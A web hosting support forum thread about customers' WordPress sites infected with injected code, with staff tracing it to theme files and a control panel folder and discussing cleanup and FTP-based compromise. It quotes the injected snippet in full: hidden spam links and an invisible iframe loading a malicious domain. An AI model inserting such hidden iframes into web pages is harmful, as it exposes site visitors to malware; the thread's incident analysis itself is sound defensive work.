Wordpress Websites listed as having iframe malware

[gsaunders]

Customer has multiple domains that appear to be hacked and contain malicious links. Here you can find info on this:

Go here http://www.unmaskparasites.com/security-report/ and then put in domain jamestippins.com and you will see results.

Then the suspicious link shown can be examined via google diagnostics here: http://www.google.com/safebrowsing/diagnostic?site=http://nipkelo.net/?click=5FB6EE

The results of this is the following code appended at the end of the resulting wordpress html code. It is found after the closing html tag. Just go to JamesTippins.com, view source and then go to the bottom of the page and you will see this:

<!-- c822c1b63853ed273b89687ac505f9fa --><u style="display: none;"><a href="http://www.msn.com/">MSN.com</a>, <a href="http://ozoxul.webhop.net/ingilizce.htm">ingilizce</a>, , , , , , <a href="http://www.msnbc.com/">MSNBC.com</a>, <a href="http://ozoxul.webhop.net/jazdy.htm">jazdy</a>, , , , , , <a href="http://ozoxul.webhop.net/interlaken.htm">interlaken</a>, <a href="http://www.msu.edu/">MSU.edu</a>, , , , , , , <a href="http://ozoxul.webhop.net/wrench.htm">wrench</a>, , , <a href="http://www.mysql.com">MySQL.com</a>, <a href="http://www.nap.edu/">NAP.edu</a>, , , , , , , , <a href="http://ozoxul.webhop.net/ulrich.htm">ulrich</a>, , <a href="http://www.nas.edu/">NAS.edu</a>, , , , , , , , , , , , , <a href="http://www.nationalacademies.org/">NationalAcademies.org</a>, , <a href="http://ozoxul.webhop.net/chavez.htm">chavez</a>, , , , , , , , , <a href="http://www.nature.com/">Nature.com</a>, , , , , , , , , <a href="http://ozoxul.webhop.net/noche.htm">noche</a>, , , <a href="http://www.netscape.com/">Netscape.com</a>, , <a href="http://ozoxul.webhop.net/nikon.htm">nikon</a>, <a href="http://ozoxul.webhop.net/akbar.htm">akbar</a>, , <a href="http://www.newsforge.com/">NewsForge.com</a>, , , , , , <a href="http://ozoxul.webhop.net/voce.htm">voce</a>, , <a href="http://ozoxul.webhop.net/wetter.htm">wetter</a>, <a href="http://www.nytimes.com/">NYTimes.com</a>, , <a href="http://www.nih.gov/">NIH.gov</a>, <a href="http://ozoxul.webhop.net/tree.htm">tree</a>, <a href="http://www.nist.gov/">NIST.gov</a>, , <a href="http://www.noaa.gov/">NOAA.gov</a>, <a href="http://www.nrel.gov/">NREL.gov</a>, <a href="http://ozoxul.webhop.net/astrology.htm">astrology</a>, , , <a href="http://www.oanda.com/">Oanda.com</a>, , , <a href="http://ozoxul.webhop.net/oxfordshire.htm">oxfordshire</a>, </u><!-- c822c1b63853ed273b89687ac505f9fa --><iframe src="http://nipkelo.net/?click=5FB6EE" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

We also found the following files in the cp folder as being infected as well:
cp\scripts\asp\index.html
cp\scripts\perl\index.html
cp\scripts\php\index.html
cp\index.html

I ended up deleting this folder. If this is his control panel then we need a clean one installed here.

But we also need to figure out how he got hacked and how to get it out of wordpress.

He has other domains with the same issue, but let's focus on this one to find a solution.

Greg

 

[gsaunders]

Ok... here is an update.

I found the injected code in the wp-content/themes/themename/index.php and some of the footer.php files.

And this looks to be in every single domain. As well as the cp folder directories listed earlier.

I think deleting the CP folder (and root index.html) completely for all domains and having them replaced is needed... and then it looks like we need to clear the offending code out of all the wordpress themes.

I have also asked the customer to upgrade all sites to the latest wordpress to plug up any security holes... to change the ftp password... and make sure the files with the injected code are cleaned.

So now how is this particular hack happening... security hole in web app or a server hack?

 

[Stephen]

This is targetting many web apps, seen several mambo and joomla sites hit the last days, looks to be using 777 permissions in most cases.

 

[gsaunders]

This is targetting many web apps, seen several mambo and joomla sites hit the last days, looks to be using 777 permissions in most cases.

I was looking at the one domain and he didn't have anything set with 777.

Most folders are 755.
Most files are 644 or 744.

Of course that is generalized findings... but I don't see anything with 777.

I do see something strange. The owner of the folders and files says 540 and I don't know what that is... I would have thought it would have been his user name. Well... in the ftp client it says 540 for the owner... but in the control panel file manager it does show username:username so maybe that is a non issue.

 

[antic]

I had a non-WP site hacked with an iframe exploit, may be related, maybe not.
http://support.jodohost.com/showthread.php?t=16472

 

[Stephen]

We've seen an increasing numebr of these done via FTP and actually posted about the vulnerability in flash and adobe reader, this MAY be part of it, of course its hard to know when someone just logs in via ftp without problem and changes files without any login issues, that it is not legit.